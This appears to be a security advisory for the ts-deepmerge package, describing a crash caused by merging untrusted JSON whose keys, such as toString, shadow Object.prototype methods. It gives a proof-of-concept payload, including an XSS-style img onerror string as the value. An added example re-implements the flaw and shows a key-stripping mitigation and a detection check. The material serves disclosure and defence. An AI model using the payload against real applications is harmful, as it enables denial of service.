Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade ts-deepmerge to version 8.0.0 or higher.
ts-deepmerge is a deep merge function that automatically infers the return type based on your input, without mutating the source objects.
Affected versions of this package are vulnerable to Uncaught Exception due to the improper handling of built-in Object.prototype methods (such as toString, valueOf). When user-controlled input contains these keys with non-function values, the resulting merged object becomes broken — any string context operation throws a TypeError, crashing the application.
const { merge } = require('ts-deepmerge');
// Attacker-controlled input (e.g. from JSON.parse of user input)
const userInput = JSON.parse('{"toString": "<img src=x onerror=alert(1)>"}');
const config = { title: 'Hello', theme: 'dark' };
const result = merge(config, userInput);
console.log(typeof result.toString); // 'string' — no longer a function
// All of the following crash the application:
`${result}` // TypeError: Cannot convert object to primitive value
'' + result // TypeError: Cannot convert object to primitive value
[result].join() // TypeError: Cannot convert object to primitive value
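As an added example (not code from the Snyk page or the ts-deepmerge project), the following reproduces the failure mode described above with a minimal deep merge and shows one mitigation: dropping keys that collide with Object.prototype members before untrusted data reaches the merge. naiveMerge, stripPrototypeKeys and breaksStringCoercion are hypothetical names, and the input is constructed.

```javascript
// Names that shadow Object.prototype members (toString, valueOf, constructor,
// hasOwnProperty, __proto__, ...). An own property with one of these names
// changes how the object behaves in string/primitive contexts.
const PROTOTYPE_KEYS = new Set(Object.getOwnPropertyNames(Object.prototype));

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Minimal deep merge standing in for the vulnerable behaviour: it copies every
// own enumerable key of the source, "toString" included (hypothetical helper).
function naiveMerge(target, source) {
  const out = { ...target };
  for (const key of Object.keys(source)) {
    const val = source[key];
    out[key] = isPlainObject(val) && isPlainObject(out[key])
      ? naiveMerge(out[key], val)
      : val;
  }
  return out;
}

// Mitigation: recursively drop any key that collides with an Object.prototype
// member so the merged result keeps the real toString/valueOf.
function stripPrototypeKeys(value) {
  if (Array.isArray(value)) return value.map(stripPrototypeKeys);
  if (!isPlainObject(value)) return value;
  const clean = {};
  for (const key of Object.keys(value)) {
    if (PROTOTYPE_KEYS.has(key)) continue; // e.g. toString, valueOf
    clean[key] = stripPrototypeKeys(value[key]);
  }
  return clean;
}

// Detection helper: true if string coercion of obj throws a TypeError,
// which is exactly the crash described in the advisory.
function breaksStringCoercion(obj) {
  try { `${obj}`; return false; } catch (e) { return e instanceof TypeError; }
}

// Constructed input with the same shape as the proof of concept above.
const userInput = JSON.parse('{"toString": "x", "nested": {"valueOf": 1}}');
const config = { title: 'Hello', theme: 'dark' };

const broken = naiveMerge(config, userInput);                      // crashes on `${broken}`
const safe = naiveMerge(config, stripPrototypeKeys(userInput));    // coerces normally
```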